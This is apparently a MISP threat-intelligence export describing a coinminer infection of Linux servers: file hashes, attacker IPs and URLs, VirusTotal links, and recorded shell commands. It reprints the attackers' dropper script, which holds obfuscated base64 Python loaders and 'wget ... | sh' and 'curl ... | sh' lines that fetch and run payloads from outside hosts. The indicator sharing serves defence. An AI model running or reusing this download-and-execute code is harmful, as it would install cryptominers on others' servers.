{
|
||
|
"Event": {
|
||
|
"analysis": "1",
|
||
|
"date": "2019-06-01",
|
||
|
"extends_uuid": "",
|
||
|
"info": "Linux server infection with coinminers (derived from original post with iptables rules)",
|
||
|
"publish_timestamp": "1559381195",
|
||
|
"published": true,
|
||
|
"threat_level_id": "3",
|
||
|
"timestamp": "1559381168",
|
||
|
"uuid": "5cf22f74-759c-4744-90eb-4300950d210f",
|
||
|
"Orgc": {
|
||
|
"name": "CIRCL",
|
||
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
||
|
},
|
||
|
"Tag": [
|
||
|
{
|
||
|
"colour": "#004646",
|
||
|
"name": "type:OSINT"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0071c3",
|
||
|
"name": "osint:lifetime=\"perpetual\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0087e8",
|
||
|
"name": "osint:certainty=\"50\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#ffffff",
|
||
|
"name": "tlp:white"
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:malpedia=\"Coinminer\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:tool=\"CoinMiner\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Resource Hijacking - T1496\""
|
||
|
},
|
||
|
{
|
||
|
"colour": "#0088cc",
|
||
|
"name": "misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\""
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf22f90-03e4-42e8-ad21-46e2950d210f",
|
||
|
"value": "2cb968c8d33d89af2ec03df8fd875ab6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf23560-1a54-4bd1-b253-4cbc950d210f",
|
||
|
"value": "0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559377496",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf23658-5858-45ec-bd98-437b950d210f",
|
||
|
"value": "http://165.227.140.184/tmp/nww"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"timestamp": "1559380507",
|
||
|
"to_ids": false,
|
||
|
"type": "attachment",
|
||
|
"uuid": "5cf2421b-bba0-4844-8d28-43c9950d210f",
|
||
|
"value": "liu.png"
|
||
|
}
|
||
|
],
|
||
|
"Object": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
|
||
|
"meta-category": "network",
|
||
|
"name": "ip-port",
|
||
|
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
|
||
|
"template_version": "8",
|
||
|
"timestamp": "1559375804",
|
||
|
"uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ip",
|
||
|
"timestamp": "1559375804",
|
||
|
"to_ids": true,
|
||
|
"type": "ip-dst",
|
||
|
"uuid": "5cf22fbc-4a28-4256-8c9f-4f60950d210f",
|
||
|
"value": "165.227.140.184"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "dst-port",
|
||
|
"timestamp": "1559375804",
|
||
|
"to_ids": false,
|
||
|
"type": "port",
|
||
|
"uuid": "5cf22fbc-5c68-4ac7-a967-484d950d210f",
|
||
|
"value": "80"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "15",
|
||
|
"timestamp": "1559377163",
|
||
|
"uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "35f44d09-4103-4f11-a1dd-74fb99172734",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1559375857",
|
||
|
"uuid": "5cf22ff1-e134-4c0e-8da7-4374950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"relationship_type": "connects-to",
|
||
|
"timestamp": "1559375901",
|
||
|
"uuid": "5cf2301d-6b34-4b80-95fd-4cf9950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "f0280498-3ef9-436d-ab5f-41ce5352bca8",
|
||
|
"referenced_uuid": "5cf234e6-2cd4-43cc-8337-4fa1950d210f",
|
||
|
"relationship_type": "executes",
|
||
|
"timestamp": "1559377163",
|
||
|
"uuid": "5cf2350b-247c-49e8-8237-4325950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "9dae9dca-70fd-41e0-a6ae-2622709fc9fb",
|
||
|
"value": "2cb968c8d33d89af2ec03df8fd875ab6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "d52ff6b2-ee13-4cfc-a5ca-2bcdcb5c7b8b",
|
||
|
"value": "535fd49cf76e48d610f2e80d0ce16d722ba6b949"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "6882da9a-5880-4205-8200-8223b7548849",
|
||
|
"value": "7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1559375857",
|
||
|
"uuid": "35f44d09-4103-4f11-a1dd-74fb99172734",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "ab588995-f90a-4487-8efd-ec53c6e3fdfd",
|
||
|
"value": "2019-02-25T10:14:54"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "dc266a97-294a-48dd-9ea8-4e2d3ec4f8e4",
|
||
|
"value": "https://www.virustotal.com/file/7a38a2d4512b775da7ea7c98e03df1ae348493ce512d761013ae123da4379805/analysis/1551089694/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1559375760",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "c278894e-a2a2-40aa-8ae3-ec6d45acc2e9",
|
||
|
"value": "6/53"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a series of shell commands executed. This object can be linked with malicious files in order to describe a specific execution of shell commands.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "shell-commands",
|
||
|
"template_uuid": "fee65efa-eb64-4516-8611-1db76c589f79",
|
||
|
"template_version": "1",
|
||
|
"timestamp": "1559377126",
|
||
|
"uuid": "5cf234e6-2cd4-43cc-8337-4fa1950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-4da8-49b5-b064-4e40950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-ee88-4671-90c3-4ee5950d210f",
|
||
|
"value": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-c614-47da-a863-46e8950d210f",
|
||
|
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-9c48-4372-bab4-42b0950d210f",
|
||
|
"value": "sh -c /var/tmp/sde ryuf"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377126",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf234e6-abec-4654-a935-4354950d210f",
|
||
|
"value": "sh -c /tmp/sde ryuf"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "15",
|
||
|
"timestamp": "1559377451",
|
||
|
"uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
|
||
|
"relationship_type": "analysed-with",
|
||
|
"timestamp": "1559377259",
|
||
|
"uuid": "5cf2356b-b850-49d4-bc56-4f04950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"relationship_type": "connects-to",
|
||
|
"timestamp": "1559377324",
|
||
|
"uuid": "5cf235ac-f414-4fb9-bf42-4fcb950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "bd7566b3-8da1-4830-9ee4-2d705598919f",
|
||
|
"referenced_uuid": "5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
|
||
|
"relationship_type": "executes",
|
||
|
"timestamp": "1559377451",
|
||
|
"uuid": "5cf2362b-3634-47b1-b963-42bb950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "106a8aa1-06b1-4f11-beb5-57962285e6ea",
|
||
|
"value": "3694010708de4a2c916e34cbe2a0ed60"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "9332298e-7763-4b34-8004-e24853631adc",
|
||
|
"value": "6faf93653c6f64d7aa814c878fed112a6db992f6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "1fc98d1a-6c44-4bc1-b1a8-55740185342c",
|
||
|
"value": "0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "VirusTotal report",
|
||
|
"meta-category": "misc",
|
||
|
"name": "virustotal-report",
|
||
|
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1559377259",
|
||
|
"uuid": "49e52bb6-f81f-4516-99e4-e2e04f1c0bc7",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "last-submission",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "datetime",
|
||
|
"uuid": "266fe354-b65d-425a-9c9e-3544e0c5a9f1",
|
||
|
"value": "2019-02-10T19:49:48"
|
||
|
},
|
||
|
{
|
||
|
"category": "External analysis",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "permalink",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "link",
|
||
|
"uuid": "e4df3142-d2dd-48ed-81d8-dada676b54e3",
|
||
|
"value": "https://www.virustotal.com/file/0bc0ea8a037baa0154c4c136bf7a3167cfd81f3c33b2969855d4ef5ce0090e72/analysis/1549828188/"
|
||
|
},
|
||
|
{
|
||
|
"category": "Artifacts dropped",
|
||
|
"comment": "Coinminer",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "detection-ratio",
|
||
|
"timestamp": "1559377248",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "a64f16e1-a212-4a8f-ba03-dbc5fed0c2bd",
|
||
|
"value": "1/58"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a series of shell commands executed. This object can be linked with malicious files in order to describe a specific execution of shell commands.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "shell-commands",
|
||
|
"template_uuid": "fee65efa-eb64-4516-8611-1db76c589f79",
|
||
|
"template_version": "1",
|
||
|
"timestamp": "1559377401",
|
||
|
"uuid": "5cf235f9-14d0-4bcf-9d72-4b5f950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-bef4-4265-ad47-48c2950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-9bfc-4e50-9433-44d2950d210f",
|
||
|
"value": "Malicious"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-a640-4b3b-8627-4592950d210f",
|
||
|
"value": "atd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "shell-command",
|
||
|
"timestamp": "1559377401",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf235f9-91cc-411f-8124-4241950d210f",
|
||
|
"value": "/bin/sh /usr/lib/ConsoleKit/run-session.d/pam-foreground-compat.ck session_removed"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "4",
|
||
|
"timestamp": "1559378537",
|
||
|
"uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf23717-673c-48de-9834-476d950d210f",
|
||
|
"relationship_type": "downloads",
|
||
|
"timestamp": "1559377717",
|
||
|
"uuid": "5cf23735-ffb0-45e3-97b5-46ff950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf237b6-06bc-4e57-ad7e-31bb950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559377880",
|
||
|
"uuid": "5cf237d8-c198-49a5-b228-40e7950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf2397c-b0a0-475d-b764-4c2a950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559378349",
|
||
|
"uuid": "5cf239ad-449c-4123-b6d6-42c6950d210f"
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf236e8-c18c-45ff-852e-4be0950d210f",
|
||
|
"referenced_uuid": "5cf23a31-1db8-4b41-81af-4416950d210f",
|
||
|
"relationship_type": "abuses",
|
||
|
"timestamp": "1559378537",
|
||
|
"uuid": "5cf23a69-a250-42a8-98a0-4fba950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-f01c-49ec-b1f0-4d88950d210f",
|
||
|
"value": "#!/bin/sh\r\nif ! ps -ax | grep -v grep | grep \"[ ]\"$ >/dev/null; then\r\n\t nohup python -c 'import os,urllib; proxies = {\"http\": \"http://41.203.146.142:8080\"};f=open(\"/tmp/hsos\",\"wb\");f.write(urllib.urlopen(\"http://165.227.140.184/tmp/ofd\",proxies=proxies\r\n).read());f.close();os.system(\"chmod +x /tmp/hsos\");os.system(\"chmod 777 /tmp/hsos\");os.system(\"/tmp/hsos\")' &\r\n\t sleep 3\r\n\t nohup python3 -c 'import urllib.request; urllib.request.urlretrieve(\"http://165.227.140.184/tmp/ofd\", \"/tmp/vov\");os.system(\"chmod 7777 /tmp/vov\");os.system(\"chmod +x /tmp/vov\");os\r\n.system(\"/tmp/vov\")' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTsgbD1iaW5hc2NpaS5iMmFfaGV4KG9zLnVyYW5kb20oNCkpOyBoZD11cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vODcuMjM2LjIxMi4yMzcvdG1wL29mZCIsI\r\nCIvdG1wLyIrbCk7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC90bXAvIitsKTtvcy5zeXN0ZW0oImNobW9kICt4IC90bXAvIitsKTsgb3Muc3lzdGVtKCIvdG1wLyIrbCk=\".decode(\"base64\"))' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTtsPWJpbmFzY2lpLmIyYV9oZXgob3MudXJhbmRvbSg0KSk7aD1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vIitsKTtwcm94aWVzPXsiaHR0cCI6Imh0dHA6Ly8yMTEuM\r\njQuMTAzLjIyODo4MCJ9O2Y9b3BlbihoLCJ3YiIpO2Yud3JpdGUodXJsbGliLnVybG9wZW4oImh0dHA6Ly84Ny4yMzYuMjEyLjIzNy90bXAvb2ZkIixwcm94aWVzPXByb3hpZXMpLnJlYWQoKSk7Zi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB\r\n7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9ICYiLmZvcm1hdChoKSk=\".decode(\"base64\"))' 2>&1\r\n\t wget -O - http://185.165.169.6/jp/_j.sh|sh ; curl http://185.165.169.6/jp/_j.jpg|sh\r\nfi"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-c8e0-4f09-a08f-4020950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-97dc-4950-8b7b-49eb950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1559377687",
|
||
|
"uuid": "5cf23717-673c-48de-9834-476d950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cf23717-3760-4566-ac39-4171950d210f",
|
||
|
"value": "ofd|9f189f26da1206151ce39e5aab269ff6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cf23717-1cc0-4498-b030-4dfe950d210f",
|
||
|
"value": "ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf23717-a51c-4984-946c-4e30950d210f",
|
||
|
"value": "9f189f26da1206151ce39e5aab269ff6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cf23717-dacc-4ee2-a604-4202950d210f",
|
||
|
"value": "4ee5040af71f5fd8080f0f0bed2672bc1f68d1e1"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf23717-a18c-4add-a8d3-4dcc950d210f",
|
||
|
"value": "1fc77ceb1ffad48a067c9c83bc1c5347e4b359b4520859b91fc14fedc29a8803"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cf23717-9e74-4830-9d52-495d950d210f",
|
||
|
"value": "56392"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559377846",
|
||
|
"uuid": "5cf237b6-06bc-4e57-ad7e-31bb950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf237b6-d330-432a-bb24-31bb950d210f",
|
||
|
"value": "http://87.236.212.237/tmp/ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "host",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": true,
|
||
|
"type": "hostname",
|
||
|
"uuid": "5cf237b6-9eb0-41b0-8815-31bb950d210f",
|
||
|
"value": "87.236.212.237"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "scheme",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf237b6-fb28-44f8-94df-31bb950d210f",
|
||
|
"value": "http"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "resource_path",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": false,
|
||
